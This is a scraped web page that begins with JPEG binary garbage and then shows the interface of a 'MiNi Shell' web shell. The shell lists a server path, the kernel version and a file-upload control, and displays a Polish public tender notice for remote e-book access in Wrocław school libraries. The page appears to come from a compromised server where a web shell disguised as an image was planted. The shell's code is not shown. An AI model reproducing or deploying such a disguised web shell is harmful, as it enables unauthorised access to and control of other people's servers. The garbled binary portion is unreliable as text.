JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241209/0064096901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa świadczenia zdalnego dostępu do publikacji elektronicznych dla czytelników Wrocławskiego Systemu Bibliotek Szkolnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM PLACÓWEK KSZTAŁCENIA ZAWODOWEGO WE WROCŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 529065560</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzegomska 49A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">53-611</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kwolicka@cpkz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ckz.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa świadczenia zdalnego dostępu do publikacji elektronicznych dla czytelników Wrocławskiego Systemu Bibliotek Szkolnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed03b1fd-1e9d-4cb3-b961-e39ae1f6fc0e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00640969</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00549087/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Usługa świadczenia zdalnego dostępu do publikacji elektronicznych dla czytelników Wrocławskiego Systemu Bibliotek Szkolnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ed03b1fd-1e9d-4cb3-b961-e39ae1f6fc0e <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja odbywa się przy użyciu Platformy e-Zamówienia -<br/>https://ezamowienia.gov.pl.<br/>W szczególnie uzasadnionych przypadkach, uniemożliwiających komunikację za pośrednictwem Platformy e-Zamówienia,<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: kwolicka@cpkz.edu.pl (nie dotyczy<br/>składania ofert).<br/>Wykonawca zobowiązany jest zadbać by osoba składająca ofertę i podejmująca działania w imieniu wykonawcy posiadała stosowne<br/>uprawnienia w systemie i miała dostęp do przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca, zamierzający wziąć<br/>udział w postępowaniu, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia<br/>wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>3.Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności: przekazywanie wezwań i zawiadomień, zadawanie<br/>pytań i udzielanie odpowiedzi.<br/>4.Zamawiający wyznacza do kontaktu z Wykonawcami - Panią Katarzynę Wolicką, e-mail: kwolicka@cpkz.edu.pl<br/>5.Ofertę składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6.Wykonawca przygotowuje ofertę przy pomocy interaktywnego „Formularza ofertowego”, udostępnionego przez Zamawiającego na<br/>Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce „Informacje podstawowe”. Aby przygotować<br/>ofertę, Wykonawca musi posiadać konto na platformie e -Zamówienia.<br/>7.Zalogowany wykonawca używając przycisku „Wypełnij”, widocznego pod „Formularzem ofertowym” zobowiązany jest do<br/>zweryfikowania poprawności danych automatycznie pobranych przez system z jego konta i uzupełnienia pozostałych informacji<br/>dotyczących wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.Następnie wykonawca powinien pobrać „Formularz ofertowy”, zapisać go na dysku komputera użytkownika, uzupełnić pozostałymi<br/>danymi wymaganymi przez Zamawiającego i ponownie zapisać na dysku komputera użytkownika oraz podpisać odpowiednim<br/>rodzajem podpisu elektronicznego.<br/>UWAGA: Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany „Formularz ofertowy” należy zawsze<br/>otwierać w programie Adobe Acrobat Reader DC.<br/>Formularz ofertowy rekomenduje się podpisać w formacie PAdES typ wewnętrzny (podpis w środku dokumentu - pliku).<br/>Po podpisaniu formularza ofertowego nie należy modyfikować pliku.<br/>9.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>10.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania), musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>11. Pozostałe wymagania określone są w rozdz. X i XIV swz</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Centrum Placówek Kształcenia Zawodowego z siedzibą we Wrocławiu, ul.<br/>Strzegomska 49a, 53-611 Wrocław, e-mail sekretariat@cpkz.edu.pl, tel. 71 798-67-00 (kontakt możliwy w godzinach od 7:00 do<br/>15:00, od poniedziałku do piątku).<br/>2. Inspektorem Ochrony Danych w Centrum Placówek Kształcenia Zawodowego jest Pan Tomasz Grzybowski, tel. 501 083 482,<br/>email<br/>iod.ckz@wroclawskaedukacja.pl. CORE Consulting sp. z o.o., ul. Wyłom 16, 61-671 Poznań.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie<br/>zamówienia publicznego nr 16/TP/CPKZ/2024, prowadzonym w trybie podstawowym z możliwością negocjacji (art. 275 pkt 2 ustawy<br/>Pzp).<br/>4. Podane przez Panią/Pana dane mogą być ujawnione: firmom<br/>utrzymującym i serwisującym nasze serwery informatyczne, kancelariom prawnym, firmom obsługującym nas w obszarze IT, w tym<br/>serwisującym urządzenia, podmiotom utrzymującym oprogramowania, z którego korzystamy w bieżącej działalności. Odbiorcami<br/>Pani/Pana danych<br/>osobowych mogą być również osoby lub podmioty, którym udostępnione zostaną informacje dotyczące postępowania, które jest<br/>jawne – z zastrzeżeniami wynikającymi z art. 18 ust. 3-6 oraz art. 74 ust. 3<br/>ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych, dalej jako: ustawa PZP.<br/>Udostępnieniu mogą podlegać wszystkie dane osobowe, z wyjątkiem danych szczególnych kategorii – określonych w art. 9 ust. 1<br/>RODO, zebranych w toku postępowania o udzielenie zamówienia.<br/>5. Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Podanie danych jest niezbędne do uczestnictwa w postępowaniu<br/>o udzielenie zamówienia publicznego. Obowiązek podania przez Panią/Pana danych osobowych jest wymogiem wynikającym z<br/>ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>Konsekwencje niepodania określonych danych wynikają z ustawy PZP.<br/>7.Pani/Pana dane osobowe nie będą podlegały profilowaniu ani zautomatyzowanemu podejmowaniu decyzji.<br/>8. Posiada Pani/Pan:− na podstawie art. 15 RODO – prawo dostępu do Pani/Pana danych osobowych;<br/>− na podstawie art. 16 RODO – prawo do sprostowania Pani/Pana danych osobowych, − na podstawie<br/>art. 18 RODO – prawo żądania od nas ograniczenia przetwarzania danych osobowych,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, tel. 22 531-03-00, e-mail: iod@uodo.gov.pl, www.uodo.gov.pl, gdy uzna Pani/Pan, że<br/>przetwarzanie przez nas danych osobowych narusza reguły przetwarzania danych osobowych.<br/>9. Nie przysługuje Pani/Panu:− prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b,<br/>d lub e RODO;− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo<br/>sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani - na podstawie art. 16 RODO – prawo do<br/>sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia danych nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym<br/>z ustawą PZP oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>-na podstawie art. 18 RODO – prawo żądania od nas ograniczenia przetwarzania danych osobowych, z zastrzeżeniem, że nie<br/>ogranicza to przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. W przypadku, gdy<br/>wniesienie żądania spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia nie będziemy udostępniać tych<br/>danych, chyba że zajdą przesłanki, o których mowa w art. 18 ust. 2 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">16/TP/CPKZ/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usługi zdalnego dostępu do publikacji elektronicznych dla czytelników Wrocławskiego Systemu Bibliotek Szkolnych.<br/>2.	Wykonawca, w ramach świadczenia usługi będącej przedmiotem zamówienia, powinien:<br/><br/>1)	umożliwić dostęp do 8 milionów stron oferowanych publikacji literatury pięknej oraz literatury faktu w formie e-book (w języku polskim), liczba czytelników: do 10 tysięcy;<br/>2)	posiadać w swojej ofercie co najmniej 30 tysięcy publikacji literatury pięknej oraz literatury faktu w formie e-book (w języku polskim).<br/><br/>3.	Wszystkie zaoferowane publikacje muszą być dostępne w języku polskim oraz mogą posiadać wersje w językach obcych.<br/>4.	Czytanie udostępnionych publikacji nie może wymagać od czytelnika stałego połączenia internetowego.<br/>5.	Czytelnik musi mieć dostęp do zaoferowanych wydawnictw zarówno na urządzeniach stacjonarnych jak i mobilnych - w tym na czytnikach m. in. inkbook, pocketbook.<br/>6.	Czytelnik uzyska dostęp do wybranych tytułów za pomocą kodów dostępowych wydawanych czytelnikom przez Zamawiającego. Ich liczba musi być zgodna z liczbą czytelników. Kody muszą być ważne przez cały okres trwania umowy. Wykonawca przekaże Zamawiającemu kody dostępowe w terminie nie później niż do 2 dni roboczych od dnia wejścia umowy w życie. <br/>7.	Wszystkie udostępnione tytuły muszą być jednocześnie dostępne dla nielimitowanej liczby czytelników<br/>8.	Czytelnik musi mieć możliwość uzyskania wielokrotnego dostępu do każdego z zaoferowanych tytułów.<br/>9.	Zamawiający musi mieć dostęp do danych statystycznych dotyczących ilości udostępnionych czytelnikom tytułów oraz kodów dostępowych.<br/>10.	Oferowana usługa musi zapewniać możliwość integracji z systemem: Sygnity Business Solutions Prolib Integro Multiwyszukiwarka. Katalog książek ma być udostępniony przez serwer HTTP w jednym pliku z formacie XML. Z systemu Prolib korzysta Wrocławskiego Systemu Bibliotek Szkolnych.<br/>11.	Szczegółowy opis przedmiotu zamówienia oraz warunki jego realizacji określa Załącznik 3 do swz – projekt umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72320000-4 - Usługi bazy danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">6.	Zamawiający przewiduje udzielenie zamówień podobnych, o których mowa w art. 305 pkt 1 w związku z art. 214 ust. 1 pkt 7 ustawy Pzp. Zamówienia podobne będą polegały na powtórzeniu usług, zgodnych z przedmiotem zamówienia. Wysokość przewidywanych zamówień podobnych – nie więcej niż 50% wartość zamówienia podstawowego. Zamawiający udzieli ich (o ile podejmie taką decyzję) w zgodzie z ustawą Pzp. Podstawą ustalenia warunków realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje. Warunki realizacji zamówień podobnych będą tożsame z tymi określonymi dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>2. Oferty niepodlegające odrzuceniu zostaną poddane ocenie ofert w oparciu o kryteria podane w niniejszym Ogłoszeniu oraz w swz.<br/>3. Oferty oceniane będą punktowo dla każdego kryterium oddzielnie.<br/>4. Za ofertę najkorzystniejszą zostanie uznana oferta ważna, która otrzyma najwyższą liczbę punktów wyliczoną jako sumę punktów<br/>uzyskanych w kryteriach podanych w Ogłoszeniu i w swz.<br/>5. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w specyfikacji warunków<br/>zamówienia i w Ogłoszeniu.<br/>6. Punktacja, przyznawana ofertom w poszczególnych kryteriach oceny ofert, liczona będzie z dokładnością do dwóch miejsc po<br/>przecinku.<br/>7. Zamawiający dokona oceny ofert według kryteriów oceny ofert podanych w Ogłoszeniu i w swz.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostęp do publikacji elektronicznych (liczba publikacji literatury pięknej oraz literatury faktu w formie e-book do jakiej Wykonawca zapewni dostęp – w języku polskim)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający informuje, że nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Formularzem ofertowym Wykonawca zobligowany jest złożyć:<br/>1)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, o którym mowa w rozdz. VIII ust. I pkt 1 i 2 swz - wzór oświadczenia stanowi Załącznik nr 1 do swz <br/>UWAGA: w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców;<br/>2)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w rozdz. XII ust. 6 swz - wzór oświadczenia stanowi załącznik nr 2 do swz (jeżeli dotyczy); <br/>3)	pełnomocnictwo* upoważniające do złożenia oferty - o ile ofertę składa pełnomocnik; <br/>4)	pełnomocnictwo* dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 